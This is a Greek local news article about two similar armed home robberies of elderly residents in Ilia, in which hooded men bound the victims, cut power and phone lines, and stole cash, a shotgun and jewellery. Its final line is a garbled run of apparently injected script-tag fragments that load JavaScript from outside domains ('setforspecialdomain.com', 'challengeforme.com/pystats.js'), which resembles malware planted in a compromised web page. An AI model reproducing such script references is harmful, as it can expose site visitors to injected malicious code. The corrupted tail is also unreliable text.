Οι σκύλοι γάβγιζαν αλλά οι ληστές δεν πτοήθηκαν

Οι σκύλοι γάβγιζαν αλλά οι ληστές δεν πτοήθηκαν!

Πολλά κοινά χαρακτηριστικά με τη ληστεία που είχε γίνει πριν από δυο 24ωρο στον συνοικισμό Βαγγελέικα στο Καπελέτο Ηλείας, έχει το νέο κρούσμα που καταγράφηκε τα ξημερώματα της Κυριακής στον οικισμό Αλφειός στη Σαλμώνη Πύργου με θύματα δυο ηλικιωμένους και την κόρη τους. Η μοναδική διαφορά, ήταν τα… σκυλιά της οικογένειας που γάβγισαν αλλά δεν απέτρεψαν τους δράστες!

Και σε αυτή την περίπτωση, οι τέσσερις κουκουλοφόροι κακοποιοί πλησίασαν αθέατοι στο σπίτι. Όταν η κόρη των ηλικιωμένων άκουσε τα γαβγίσματα και άνοιξε την πόρτα για να δει τι συμβαίνει, οι δράστες την έσπρωξαν και όρμησαν μέσα στο σπίτι όπου την ακινητοποίησαν μαζί με τους γονείς της απειλώντας τους με όπλο.

Στη συνέχεια, ερεύνησαν το σπίτι, άρπαξαν 650 ευρώ και μια καραμπίνα και έδεσαν χειροπόδαρα με σεντόνια τους ηλικιωμένους και την κόρη τους. Οι κακοποιοί, που ήταν πιθανότατα αλλοδαποί, έκοψαν τη σύνδεση του τηλεφώνου και την παροχή ηλεκτρικού ρεύματος και τράπηκαν σε φυγή με άγνωστο μέσο. Η κακοκαιρία εμπόδισε την κόρη του ζευγαριού να καταγγείλει τη ληστεία στην Αστυνομία, πράγμα που έγινε πολλές ώρες αργότερα, όταν οι δράστες βρίσκονταν πια μακριά.

Με ακριβώς την ίδια μέθοδο οι κακοποιοί, που πιθανότατα είναι οι ίδιοι, είχαν ληστέψει την προηγούμενη ημέρα ένα ζευγάρι ηλικίας 72 και 74 χρόνων αφού έκοψαν τα καλώδια παροχής ηλεκτρικού ρεύματος και παραβίασαν την μπαλκονόπορτα του σπιτιού τους. Τους ξύπνησαν χτυπώντας τους και τους πίεζαν να αποκαλύψουν πού είχαν χρήματα και τιμαλφή. Οι κακοποιοί άρπαξαν 250 ευρώ, χρυσαφικά άγνωστης αξίας, την τηλεόραση, τη συσκευή του σταθερού τηλεφώνου και μια λάμπα… φθορίου και έφυγαν βιαστικά φορτώνοντας τη λεία τους στο αυτοκίνητό τους.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >